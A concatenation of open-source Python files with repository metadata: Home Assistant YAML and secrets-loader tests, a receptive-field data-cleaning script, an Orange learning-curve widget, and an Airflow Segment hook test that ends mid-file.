| mpl-2.0 | -1,573,903,108,648,493,300 | 28.315789 | 129 | 0.523878 | false |
jamespcole/home-assistant | tests/util/test_yaml.py | 1 | 17357 | """Test Home Assistant yaml loader."""
import io
import os
import unittest
import logging
from unittest.mock import patch
import pytest
from homeassistant.exceptions import HomeAssistantError
from homeassistant.util import yaml
from homeassistant.config import YAML_CONFIG_FILE, load_yaml_config_file
from tests.common import get_test_config_dir, patch_yaml_files
@pytest.fixture(autouse=True)
def mock_credstash():
"""Mock credstash so it doesn't connect to the internet."""
with patch.object(yaml, 'credstash') as mock_credstash:
mock_credstash.getSecret.return_value = None
yield mock_credstash
class TestYaml(unittest.TestCase):
"""Test util.yaml loader."""
# pylint: disable=no-self-use, invalid-name
def test_simple_list(self):
"""Test simple list."""
conf = "config:\n - simple\n - list"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc['config'] == ["simple", "list"]
def test_simple_dict(self):
"""Test simple dict."""
conf = "key: value"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc['key'] == 'value'
def test_unhashable_key(self):
"""Test an unhasable key."""
files = {YAML_CONFIG_FILE: 'message:\n {{ states.state }}'}
with pytest.raises(HomeAssistantError), \
patch_yaml_files(files):
load_yaml_config_file(YAML_CONFIG_FILE)
def test_no_key(self):
"""Test item without a key."""
files = {YAML_CONFIG_FILE: 'a: a\nnokeyhere'}
with pytest.raises(HomeAssistantError), \
patch_yaml_files(files):
yaml.load_yaml(YAML_CONFIG_FILE)
def test_environment_variable(self):
"""Test config file with environment variable."""
os.environ["PASSWORD"] = "secret_password"
conf = "password: !env_var PASSWORD"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc['password'] == "secret_password"
del os.environ["PASSWORD"]
def test_environment_variable_default(self):
"""Test config file with default value for environment variable."""
conf = "password: !env_var PASSWORD secret_password"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc['password'] == "secret_password"
def test_invalid_environment_variable(self):
"""Test config file with no environment variable sat."""
conf = "password: !env_var PASSWORD"
with pytest.raises(HomeAssistantError):
with io.StringIO(conf) as file:
yaml.yaml.safe_load(file)
def test_include_yaml(self):
"""Test include yaml."""
with patch_yaml_files({'test.yaml': 'value'}):
conf = 'key: !include test.yaml'
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc["key"] == "value"
with patch_yaml_files({'test.yaml': None}):
conf = 'key: !include test.yaml'
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc["key"] == {}
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_list(self, mock_walk):
"""Test include dir list yaml."""
mock_walk.return_value = [
['/tmp', [], ['two.yaml', 'one.yaml']],
]
with patch_yaml_files({
'/tmp/one.yaml': 'one',
'/tmp/two.yaml': 'two',
}):
conf = "key: !include_dir_list /tmp"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc["key"] == sorted(["one", "two"])
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_list_recursive(self, mock_walk):
"""Test include dir recursive list yaml."""
mock_walk.return_value = [
['/tmp', ['tmp2', '.ignore', 'ignore'], ['zero.yaml']],
['/tmp/tmp2', [], ['one.yaml', 'two.yaml']],
['/tmp/ignore', [], ['.ignore.yaml']]
]
with patch_yaml_files({
'/tmp/zero.yaml': 'zero',
'/tmp/tmp2/one.yaml': 'one',
'/tmp/tmp2/two.yaml': 'two'
}):
conf = "key: !include_dir_list /tmp"
with io.StringIO(conf) as file:
assert '.ignore' in mock_walk.return_value[0][1], \
"Expecting .ignore in here"
doc = yaml.yaml.safe_load(file)
assert 'tmp2' in mock_walk.return_value[0][1]
assert '.ignore' not in mock_walk.return_value[0][1]
assert sorted(doc["key"]) == sorted(["zero", "one", "two"])
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_named(self, mock_walk):
"""Test include dir named yaml."""
mock_walk.return_value = [
['/tmp', [], ['first.yaml', 'second.yaml']]
]
with patch_yaml_files({
'/tmp/first.yaml': 'one',
'/tmp/second.yaml': 'two'
}):
conf = "key: !include_dir_named /tmp"
correct = {'first': 'one', 'second': 'two'}
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc["key"] == correct
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_named_recursive(self, mock_walk):
"""Test include dir named yaml."""
mock_walk.return_value = [
['/tmp', ['tmp2', '.ignore', 'ignore'], ['first.yaml']],
['/tmp/tmp2', [], ['second.yaml', 'third.yaml']],
['/tmp/ignore', [], ['.ignore.yaml']]
]
with patch_yaml_files({
'/tmp/first.yaml': 'one',
'/tmp/tmp2/second.yaml': 'two',
'/tmp/tmp2/third.yaml': 'three'
}):
conf = "key: !include_dir_named /tmp"
correct = {'first': 'one', 'second': 'two', 'third': 'three'}
with io.StringIO(conf) as file:
assert '.ignore' in mock_walk.return_value[0][1], \
"Expecting .ignore in here"
doc = yaml.yaml.safe_load(file)
assert 'tmp2' in mock_walk.return_value[0][1]
assert '.ignore' not in mock_walk.return_value[0][1]
assert doc["key"] == correct
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_merge_list(self, mock_walk):
"""Test include dir merge list yaml."""
mock_walk.return_value = [['/tmp', [], ['first.yaml', 'second.yaml']]]
with patch_yaml_files({
'/tmp/first.yaml': '- one',
'/tmp/second.yaml': '- two\n- three'
}):
conf = "key: !include_dir_merge_list /tmp"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert sorted(doc["key"]) == sorted(["one", "two", "three"])
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_merge_list_recursive(self, mock_walk):
"""Test include dir merge list yaml."""
mock_walk.return_value = [
['/tmp', ['tmp2', '.ignore', 'ignore'], ['first.yaml']],
['/tmp/tmp2', [], ['second.yaml', 'third.yaml']],
['/tmp/ignore', [], ['.ignore.yaml']]
]
with patch_yaml_files({
'/tmp/first.yaml': '- one',
'/tmp/tmp2/second.yaml': '- two',
'/tmp/tmp2/third.yaml': '- three\n- four'
}):
conf = "key: !include_dir_merge_list /tmp"
with io.StringIO(conf) as file:
assert '.ignore' in mock_walk.return_value[0][1], \
"Expecting .ignore in here"
doc = yaml.yaml.safe_load(file)
assert 'tmp2' in mock_walk.return_value[0][1]
assert '.ignore' not in mock_walk.return_value[0][1]
assert sorted(doc["key"]) == sorted(["one", "two",
"three", "four"])
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_merge_named(self, mock_walk):
"""Test include dir merge named yaml."""
mock_walk.return_value = [['/tmp', [], ['first.yaml', 'second.yaml']]]
files = {
'/tmp/first.yaml': 'key1: one',
'/tmp/second.yaml': 'key2: two\nkey3: three',
}
with patch_yaml_files(files):
conf = "key: !include_dir_merge_named /tmp"
with io.StringIO(conf) as file:
doc = yaml.yaml.safe_load(file)
assert doc["key"] == {
"key1": "one",
"key2": "two",
"key3": "three"
}
@patch('homeassistant.util.yaml.os.walk')
def test_include_dir_merge_named_recursive(self, mock_walk):
"""Test include dir merge named yaml."""
mock_walk.return_value = [
['/tmp', ['tmp2', '.ignore', 'ignore'], ['first.yaml']],
['/tmp/tmp2', [], ['second.yaml', 'third.yaml']],
['/tmp/ignore', [], ['.ignore.yaml']]
]
with patch_yaml_files({
'/tmp/first.yaml': 'key1: one',
'/tmp/tmp2/second.yaml': 'key2: two',
'/tmp/tmp2/third.yaml': 'key3: three\nkey4: four'
}):
conf = "key: !include_dir_merge_named /tmp"
with io.StringIO(conf) as file:
assert '.ignore' in mock_walk.return_value[0][1], \
"Expecting .ignore in here"
doc = yaml.yaml.safe_load(file)
assert 'tmp2' in mock_walk.return_value[0][1]
assert '.ignore' not in mock_walk.return_value[0][1]
assert doc["key"] == {
"key1": "one",
"key2": "two",
"key3": "three",
"key4": "four"
}
@patch('homeassistant.util.yaml.open', create=True)
def test_load_yaml_encoding_error(self, mock_open):
"""Test raising a UnicodeDecodeError."""
mock_open.side_effect = UnicodeDecodeError('', b'', 1, 0, '')
with pytest.raises(HomeAssistantError):
yaml.load_yaml('test')
def test_dump(self):
"""The that the dump method returns empty None values."""
assert yaml.dump({'a': None, 'b': 'b'}) == 'a:\nb: b\n'
def test_dump_unicode(self):
"""The that the dump method returns empty None values."""
assert yaml.dump({'a': None, 'b': 'привет'}) == 'a:\nb: привет\n'
FILES = {}
def load_yaml(fname, string):
"""Write a string to file and return the parsed yaml."""
FILES[fname] = string
with patch_yaml_files(FILES):
return load_yaml_config_file(fname)
class FakeKeyring():
"""Fake a keyring class."""
def __init__(self, secrets_dict):
"""Store keyring dictionary."""
self._secrets = secrets_dict
# pylint: disable=protected-access
def get_password(self, domain, name):
"""Retrieve password."""
assert domain == yaml._SECRET_NAMESPACE
return self._secrets.get(name)
class TestSecrets(unittest.TestCase):
"""Test the secrets parameter in the yaml utility."""
# pylint: disable=protected-access,invalid-name
def setUp(self):
"""Create & load secrets file."""
config_dir = get_test_config_dir()
yaml.clear_secret_cache()
self._yaml_path = os.path.join(config_dir, YAML_CONFIG_FILE)
self._secret_path = os.path.join(config_dir, yaml.SECRET_YAML)
self._sub_folder_path = os.path.join(config_dir, 'subFolder')
self._unrelated_path = os.path.join(config_dir, 'unrelated')
load_yaml(self._secret_path,
'http_pw: pwhttp\n'
'comp1_un: un1\n'
'comp1_pw: pw1\n'
'stale_pw: not_used\n'
'logger: debug\n')
self._yaml = load_yaml(self._yaml_path,
'http:\n'
' api_password: !secret http_pw\n'
'component:\n'
' username: !secret comp1_un\n'
' password: !secret comp1_pw\n'
'')
def tearDown(self):
"""Clean up secrets."""
yaml.clear_secret_cache()
FILES.clear()
def test_secrets_from_yaml(self):
"""Did secrets load ok."""
expected = {'api_password': 'pwhttp'}
assert expected == self._yaml['http']
expected = {
'username': 'un1',
'password': 'pw1'}
assert expected == self._yaml['component']
def test_secrets_from_parent_folder(self):
"""Test loading secrets from parent foler."""
expected = {'api_password': 'pwhttp'}
self._yaml = load_yaml(os.path.join(self._sub_folder_path, 'sub.yaml'),
'http:\n'
' api_password: !secret http_pw\n'
'component:\n'
' username: !secret comp1_un\n'
' password: !secret comp1_pw\n'
'')
assert expected == self._yaml['http']
def test_secret_overrides_parent(self):
"""Test loading current directory secret overrides the parent."""
expected = {'api_password': 'override'}
load_yaml(os.path.join(self._sub_folder_path, yaml.SECRET_YAML),
'http_pw: override')
self._yaml = load_yaml(os.path.join(self._sub_folder_path, 'sub.yaml'),
'http:\n'
' api_password: !secret http_pw\n'
'component:\n'
' username: !secret comp1_un\n'
' password: !secret comp1_pw\n'
'')
assert expected == self._yaml['http']
def test_secrets_from_unrelated_fails(self):
"""Test loading secrets from unrelated folder fails."""
load_yaml(os.path.join(self._unrelated_path, yaml.SECRET_YAML),
'test: failure')
with pytest.raises(HomeAssistantError):
load_yaml(os.path.join(self._sub_folder_path, 'sub.yaml'),
'http:\n'
' api_password: !secret test')
def test_secrets_keyring(self):
"""Test keyring fallback & get_password."""
yaml.keyring = None # Ensure its not there
yaml_str = 'http:\n api_password: !secret http_pw_keyring'
with pytest.raises(yaml.HomeAssistantError):
load_yaml(self._yaml_path, yaml_str)
yaml.keyring = FakeKeyring({'http_pw_keyring': 'yeah'})
_yaml = load_yaml(self._yaml_path, yaml_str)
assert {'http': {'api_password': 'yeah'}} == _yaml
@patch.object(yaml, 'credstash')
def test_secrets_credstash(self, mock_credstash):
"""Test credstash fallback & get_password."""
mock_credstash.getSecret.return_value = 'yeah'
yaml_str = 'http:\n api_password: !secret http_pw_credstash'
_yaml = load_yaml(self._yaml_path, yaml_str)
log = logging.getLogger()
log.error(_yaml['http'])
assert {'api_password': 'yeah'} == _yaml['http']
def test_secrets_logger_removed(self):
"""Ensure logger: debug was removed."""
with pytest.raises(yaml.HomeAssistantError):
load_yaml(self._yaml_path, 'api_password: !secret logger')
@patch('homeassistant.util.yaml._LOGGER.error')
def test_bad_logger_value(self, mock_error):
"""Ensure logger: debug was removed."""
yaml.clear_secret_cache()
load_yaml(self._secret_path, 'logger: info\npw: abc')
load_yaml(self._yaml_path, 'api_password: !secret pw')
assert mock_error.call_count == 1, \
"Expected an error about logger: value"
def test_secrets_are_not_dict(self):
"""Did secrets handle non-dict file."""
FILES[self._secret_path] = (
'- http_pw: pwhttp\n'
' comp1_un: un1\n'
' comp1_pw: pw1\n')
yaml.clear_secret_cache()
with pytest.raises(HomeAssistantError):
load_yaml(self._yaml_path,
'http:\n'
' api_password: !secret http_pw\n'
'component:\n'
' username: !secret comp1_un\n'
' password: !secret comp1_pw\n'
'')
def test_representing_yaml_loaded_data():
"""Test we can represent YAML loaded data."""
files = {YAML_CONFIG_FILE: 'key: [1, "2", 3]'}
with patch_yaml_files(files):
data = load_yaml_config_file(YAML_CONFIG_FILE)
assert yaml.dump(data) == "key:\n- 1\n- '2'\n- 3\n"
def test_duplicate_key(caplog):
"""Test duplicate dict keys."""
files = {YAML_CONFIG_FILE: 'key: thing1\nkey: thing2'}
with patch_yaml_files(files):
load_yaml_config_file(YAML_CONFIG_FILE)
assert 'contains duplicate key' in caplog.text
| apache-2.0 | -1,518,754,949,115,915,300 | 37.977528 | 79 | 0.528452 | false |
gdetor/SI-RF-Structure | Statistics/clear_data.py | 1 | 5369 | # Copyright (c) 2014, Georgios Is. Detorakis ([email protected]) and
# Nicolas P. Rougier ([email protected])
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# This file is part of the source code accompany the peer-reviewed article:
# [1] "Structure of Receptive Fields in a Computational Model of Area 3b of
# Primary Sensory Cortex", Georgios Is. Detorakis and Nicolas P. Rougier,
# Frontiers in Computational Neuroscience, 2014.
#
# This script applies all the filters and cleaning techniques to the ncRFs. You
# have to use this script before any further statistical analysis to the data.
import numpy as np
from matplotlib import rc
import matplotlib.pylab as plt
from scipy.stats.stats import pearsonr
from scipy.stats.mstats import gmean
from scipy.ndimage import gaussian_filter
def locate_noise( input ):
n = input.shape[0]
data = input.copy()
count = 0
for i in range( 1,n-1 ):
for j in range( 1,n-1 ):
if data[i,j] != 0:
if data[i+1,j] != 0 and np.sign(data[i+1,j])==np.sign(data[i,j]):
count += 1
if data[i-1,j] != 0 and np.sign(data[i-1,j])==np.sign(data[i,j]):
count += 1
if data[i,j-1] != 0 and np.sign(data[i,j-1])==np.sign(data[i,j]):
count += 1
if data[i,j+1] != 0 and np.sign(data[i,j+1])==np.sign(data[i,j]):
count += 1
if count < 2:
data[i,j] = 0
count = 0
return data
# Computing the area of the receptive fields according to Dicarlo's
# protocol described in article "Structure of Receptive Fields in area 3b...
def clear_data( RFs, n ):
p = 25
Z, T = [], []
Noise = np.load( 'noise.npy' ).reshape(n*n,p,p)
cRFs = np.zeros((n*n,p,p))
for i in range( n ):
for j in range( n ):
RF = RFs[i,j,...]
# WARNING : Centering the RF
s0,s1 = np.unravel_index(np.argmax(RF),RF.shape)
RF = np.roll(RF,13-s0,axis=0)
RF = np.roll(RF,13-s1,axis=1)
# WARNING : Centering the RF
# RF += Noise[i*n+j]
# RF = gaussian_filter( RF, sigma=2.2 )
RF += 1.5*Noise[i*n+j]
RF = gaussian_filter( RF, sigma=1.5 )
abs_max = np.max( np.abs( RF ) )
RF[np.where( ( ( RF < +0.10*abs_max ) & (RF>0) ) | ( ( RF > -0.10*abs_max ) & (RF < 0) ) ) ]=0
RF = locate_noise( RF )
cRFs[i*n+j,...] = RF
exc = 50.0 * ( RF > 0).sum()/( p * p )
inh = 50.0 * ( RF < 0).sum()/( p * p )
Z.append([exc,inh])
Z = np.array(Z)
np.nan_to_num(Z)
print '------ Excitatory ------- Inhibitory -------'
print 'Minimum :', Z[:,0].min(), Z[:,1].min()
print 'Maximum :', Z[:,0].max(), Z[:,1].max()
print 'Mean :', np.mean( Z[:,0] ), np.mean( Z[:,1] )
print 'Mean :', np.mean( np.log10(Z[:,0]) ), np.mean( np.log10(Z[:,1]) )
print 'SD : ', np.std( np.log10(Z[:,0]) ), np.std( np.log10(Z[:,1]) )
print 'GMean :', gmean( Z[:,0] ), gmean( Z[:,1] )
print "Pearson cor: ", pearsonr( Z[:,0], np.abs(Z[:,1]) )
return Z, cRFs
# Computing the SNR of the receptive fields.
def snr( signal, sigma ):
k = signal.shape[0]
# Filtering the input signal
filtered_s = gaussian_filter( signal, sigma )
# Computing background noise
noise = signal - filtered_s
# Computing noise variance
noise_var = np.var( noise )
# Computing signal and noise power
signalPow = np.sum( signal**2 )/k
noisePow = np.sum( noise**2 )/k
# Computing snr and noise index
snr = 10.0 * np.log10( signalPow/noisePow )
noise_index = noise_var/np.abs(signal).max() *100.0
return snr, noise_index, filtered_s
# Main :p
if __name__=='__main__':
np.random.seed(137)
RFs = np.load('real-rfs-ref.npy').reshape(32,32,25,25)
n, size, bins = RFs.shape[0], RFs.shape[2], 70
Z, cRFs = clear_data( RFs, n )
np.save('areas-ref', Z)
np.save('cleared-rfs', cRFs)
| gpl-3.0 | -1,296,385,003,780,873,000 | 37.625899 | 106 | 0.631589 | false |
cheral/orange3 | doc/development/source/orange-demo/orangedemo/OWLearningCurveB.py | 2 | 13882 | import sys
from collections import OrderedDict
from functools import reduce
import numpy
import sklearn.cross_validation
from PyQt4.QtGui import QTableWidget, QTableWidgetItem
import Orange.data
import Orange.classification
from Orange.widgets import widget, gui, settings
from Orange.evaluation.testing import Results
class OWLearningCurveB(widget.OWWidget):
name = "Learning Curve (B)"
description = ("Takes a data set and a set of learners and shows a "
"learning curve in a table")
icon = "icons/LearningCurve.svg"
priority = 1010
# [start-snippet-1]
inputs = [("Data", Orange.data.Table, "set_dataset", widget.Default),
("Test Data", Orange.data.Table, "set_testdataset"),
("Learner", Orange.classification.Learner, "set_learner",
widget.Multiple + widget.Default)]
# [end-snippet-1]
#: cross validation folds
folds = settings.Setting(5)
#: points in the learning curve
steps = settings.Setting(10)
#: index of the selected scoring function
scoringF = settings.Setting(0)
#: compute curve on any change of parameters
commitOnChange = settings.Setting(True)
def __init__(self):
super().__init__()
# sets self.curvePoints, self.steps equidistant points from
# 1/self.steps to 1
self.updateCurvePoints()
self.scoring = [
("Classification Accuracy", Orange.evaluation.scoring.CA),
("AUC", Orange.evaluation.scoring.AUC),
("Precision", Orange.evaluation.scoring.Precision),
("Recall", Orange.evaluation.scoring.Recall)
]
#: input data on which to construct the learning curve
self.data = None
#: optional test data
self.testdata = None
#: A {input_id: Learner} mapping of current learners from input channel
self.learners = OrderedDict()
#: A {input_id: List[Results]} mapping of input id to evaluation
#: results list, one for each curve point
self.results = OrderedDict()
#: A {input_id: List[float]} mapping of input id to learning curve
#: point scores
self.curves = OrderedDict()
# GUI
box = gui.widgetBox(self.controlArea, "Info")
self.infoa = gui.widgetLabel(box, 'No data on input.')
self.infob = gui.widgetLabel(box, 'No learners.')
gui.separator(self.controlArea)
box = gui.widgetBox(self.controlArea, "Evaluation Scores")
gui.comboBox(box, self, "scoringF",
items=[x[0] for x in self.scoring],
callback=self._invalidate_curves)
gui.separator(self.controlArea)
box = gui.widgetBox(self.controlArea, "Options")
gui.spin(box, self, 'folds', 2, 100, step=1,
label='Cross validation folds: ', keyboardTracking=False,
callback=lambda:
self._invalidate_results() if self.commitOnChange else None
)
gui.spin(box, self, 'steps', 2, 100, step=1,
label='Learning curve points: ', keyboardTracking=False,
callback=[self.updateCurvePoints,
lambda: self._invalidate_results() if self.commitOnChange else None])
gui.checkBox(box, self, 'commitOnChange', 'Apply setting on any change')
self.commitBtn = gui.button(box, self, "Apply Setting",
callback=self._invalidate_results,
disabled=True)
gui.rubber(self.controlArea)
# table widget
self.table = gui.table(self.mainArea,
selectionMode=QTableWidget.NoSelection)
##########################################################################
# slots: handle input signals
def set_dataset(self, data):
"""Set the input train dataset."""
# Clear all results/scores
for id in list(self.results):
self.results[id] = None
for id in list(self.curves):
self.curves[id] = None
self.data = data
if data is not None:
self.infoa.setText('%d instances in input data set' % len(data))
else:
self.infoa.setText('No data on input.')
self.commitBtn.setEnabled(self.data is not None)
def set_testdataset(self, testdata):
"""Set a separate test dataset."""
# Clear all results/scores
for id in list(self.results):
self.results[id] = None
for id in list(self.curves):
self.curves[id] = None
self.testdata = testdata
def set_learner(self, learner, id):
"""Set the input learner for channel id."""
if id in self.learners:
if learner is None:
# remove a learner and corresponding results
del self.learners[id]
del self.results[id]
del self.curves[id]
else:
# update/replace a learner on a previously connected link
self.learners[id] = learner
# invalidate the cross-validation results and curve scores
# (will be computed/updated in `_update`)
self.results[id] = None
self.curves[id] = None
else:
if learner is not None:
self.learners[id] = learner
# initialize the cross-validation results and curve scores
# (will be computed/updated in `_update`)
self.results[id] = None
self.curves[id] = None
if len(self.learners):
self.infob.setText("%d learners on input." % len(self.learners))
else:
self.infob.setText("No learners.")
self.commitBtn.setEnabled(len(self.learners))
def handleNewSignals(self):
if self.data is not None:
self._update()
self._update_curve_points()
self._update_table()
def _invalidate_curves(self):
if self.data is not None:
self._update_curve_points()
self._update_table()
def _invalidate_results(self):
for id in self.learners:
self.curves[id] = None
self.results[id] = None
if self.data is not None:
self._update()
self._update_curve_points()
self._update_table()
def _update(self):
assert self.data is not None
# collect all learners for which results have not yet been computed
need_update = [(id, learner) for id, learner in self.learners.items()
if self.results[id] is None]
if not need_update:
return
learners = [learner for _, learner in need_update]
self.progressBarInit()
if self.testdata is None:
# compute the learning curve result for all learners in one go
results = learning_curve(
learners, self.data, folds=self.folds,
proportions=self.curvePoints,
callback=lambda value: self.progressBarSet(100 * value)
)
else:
results = learning_curve_with_test_data(
learners, self.data, self.testdata, times=self.folds,
proportions=self.curvePoints,
callback=lambda value: self.progressBarSet(100 * value)
)
self.progressBarFinished()
# split the combined result into per learner/model results
results = [list(Results.split_by_model(p_results)) for p_results in results]
for i, (id, learner) in enumerate(need_update):
self.results[id] = [p_results[i] for p_results in results]
def _update_curve_points(self):
for id in self.learners:
curve = [self.scoring[self.scoringF][1](x)[0]
for x in self.results[id]]
self.curves[id] = curve
def _update_table(self):
self.table.setRowCount(0)
self.table.setRowCount(len(self.curvePoints))
self.table.setColumnCount(len(self.learners))
self.table.setHorizontalHeaderLabels(
[learner.name for _, learner in self.learners.items()])
self.table.setVerticalHeaderLabels(
["{:.2f}".format(p) for p in self.curvePoints])
if self.data is None:
return
for column, curve in enumerate(self.curves.values()):
for row, point in enumerate(curve):
self.table.setItem(
row, column, QTableWidgetItem("{:.5f}".format(point)))
for i in range(len(self.learners)):
sh = self.table.sizeHintForColumn(i)
cwidth = self.table.columnWidth(i)
self.table.setColumnWidth(i, max(sh, cwidth))
def updateCurvePoints(self):
self.curvePoints = [(x + 1.)/self.steps for x in range(self.steps)]
def learning_curve(learners, data, folds=10, proportions=None,
random_state=None, callback=None):
if proportions is None:
proportions = numpy.linspace(0.0, 1.0, 10 + 1, endpoint=True)[1:]
def select_proportion_preproc(data, p, rstate=None):
assert 0 < p <= 1
rstate = numpy.random.RandomState(None) if rstate is None else rstate
indices = rstate.permutation(len(data))
n = int(numpy.ceil(len(data) * p))
return data[indices[:n]]
if callback is not None:
parts_count = len(proportions)
callback_wrapped = lambda part: \
lambda value: callback(value / parts_count + part / parts_count)
else:
callback_wrapped = lambda part: None
results = [
Orange.evaluation.CrossValidation(
data, learners, k=folds,
preprocessor=lambda data, p=p:
select_proportion_preproc(data, p),
callback=callback_wrapped(i)
)
for i, p in enumerate(proportions)
]
return results
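# Example usage (sketch, assuming the iris dataset ships with this Orange version
# and that both learner classes below are available, as in main() at the bottom):
#   data = Orange.data.Table("iris")
#   learners = [Orange.classification.NaiveBayesLearner(),
#               Orange.classification.LogisticRegressionLearner()]
#   # one CrossValidation result per proportion, each covering all learners
#   curve = learning_curve(learners, data, folds=5,
#                          proportions=[0.25, 0.5, 0.75, 1.0])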
def learning_curve_with_test_data(learners, traindata, testdata, times=10,
proportions=None, random_state=None,
callback=None):
if proportions is None:
proportions = numpy.linspace(0.0, 1.0, 10 + 1, endpoint=True)[1:]
def select_proportion_preproc(data, p, rstate=None):
assert 0 < p <= 1
rstate = numpy.random.RandomState(None) if rstate is None else rstate
indices = rstate.permutation(len(data))
n = int(numpy.ceil(len(data) * p))
return data[indices[:n]]
if callback is not None:
parts_count = len(proportions) * times
callback_wrapped = lambda part: \
lambda value: callback(value / parts_count + part / parts_count)
else:
callback_wrapped = lambda part: None
results = [
[Orange.evaluation.TestOnTestData(
traindata, testdata, learners,
preprocessor=lambda data, p=p:
select_proportion_preproc(data, p),
callback=callback_wrapped(i * times + t))
for t in range(times)]
for i, p in enumerate(proportions)
]
results = [reduce(results_add, res, Orange.evaluation.Results())
for res in results]
return results
def results_add(x, y):
def is_empty(res):
return (getattr(res, "models", None) is None
and getattr(res, "row_indices", None) is None)
if is_empty(x):
return y
elif is_empty(y):
return x
assert x.data is y.data
assert x.domain is y.domain
assert x.predicted.shape[0] == y.predicted.shape[0]
row_indices = numpy.hstack((x.row_indices, y.row_indices))
predicted = numpy.hstack((x.predicted, y.predicted))
actual = numpy.hstack((x.actual, y.actual))
xprob = getattr(x, "probabilities", None)
yprob = getattr(y, "probabilities", None)
if xprob is None and yprob is None:
prob = None
elif xprob is not None and yprob is not None:
prob = numpy.concatenate((xprob, yprob), axis=1)
else:
raise ValueError()
res = Orange.evaluation.Results()
res.data = x.data
res.domain = x.domain
res.row_indices = row_indices
res.actual = actual
res.predicted = predicted
res.folds = None
if prob is not None:
res.probabilities = prob
if x.models is not None and y.models is not None:
res.models = [xm + ym for xm, ym in zip(x.models, y.models)]
nmodels = predicted.shape[0]
xfailed = getattr(x, "failed", None) or [False] * nmodels
yfailed = getattr(y, "failed", None) or [False] * nmodels
assert len(xfailed) == len(yfailed)
res.failed = [xe or ye for xe, ye in zip(xfailed, yfailed)]
return res
def main(argv=sys.argv):
from PyQt4.QtGui import QApplication
app = QApplication(argv)
argv = app.argv()
if len(argv) > 1:
filename = argv[1]
else:
filename = "iris"
data = Orange.data.Table(filename)
indices = numpy.random.permutation(len(data))
traindata = data[indices[:-20]]
testdata = data[indices[-20:]]
ow = OWLearningCurveB()
ow.show()
ow.raise_()
ow.set_dataset(traindata)
ow.set_testdataset(testdata)
l1 = Orange.classification.NaiveBayesLearner()
l1.name = 'Naive Bayes'
ow.set_learner(l1, 1)
l2 = Orange.classification.LogisticRegressionLearner()
l2.name = 'Logistic Regression'
ow.set_learner(l2, 2)
l4 = Orange.classification.SklTreeLearner()
l4.name = "Decision Tree"
ow.set_learner(l4, 3)
ow.handleNewSignals()
app.exec_()
ow.set_dataset(None)
ow.set_testdataset(None)
ow.set_learner(None, 1)
ow.set_learner(None, 2)
ow.set_learner(None, 3)
ow.handleNewSignals()
return 0
if __name__=="__main__":
sys.exit(main())
| bsd-2-clause | 929,211,082,219,131,100 | 33.02451 | 96 | 0.590693 | false |
bolkedebruin/airflow | tests/providers/segment/hooks/test_segment.py | 1 | 2017 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
from unittest import mock
from airflow import AirflowException
from airflow.providers.segment.hooks.segment import SegmentHook
TEST_CONN_ID = 'test_segment'
WRITE_KEY = 'foo'
class TestSegmentHook(unittest.TestCase):
def setUp(self):
super().setUp()
self.conn = conn = mock.MagicMock()
conn.write_key = WRITE_KEY
self.expected_write_key = WRITE_KEY
self.conn.extra_dejson = {'write_key': self.expected_write_key}
class UnitTestSegmentHook(SegmentHook):
def get_conn(self):
return conn
def get_connection(self, _):
return conn
self.test_hook = UnitTestSegmentHook(segment_conn_id=TEST_CONN_ID)
def test_get_conn(self):
expected_connection = self.test_hook.get_conn()
self.assertEqual(expected_connection, self.conn)
self.assertIsNotNone(expected_connection.write_key)
self.assertEqual(expected_connection.write_key, self.expected_write_key)
def test_on_error(self):
with self.assertRaises(AirflowException):
self.test_hook.on_error('error', ['items'])
if __name__ == '__main__':
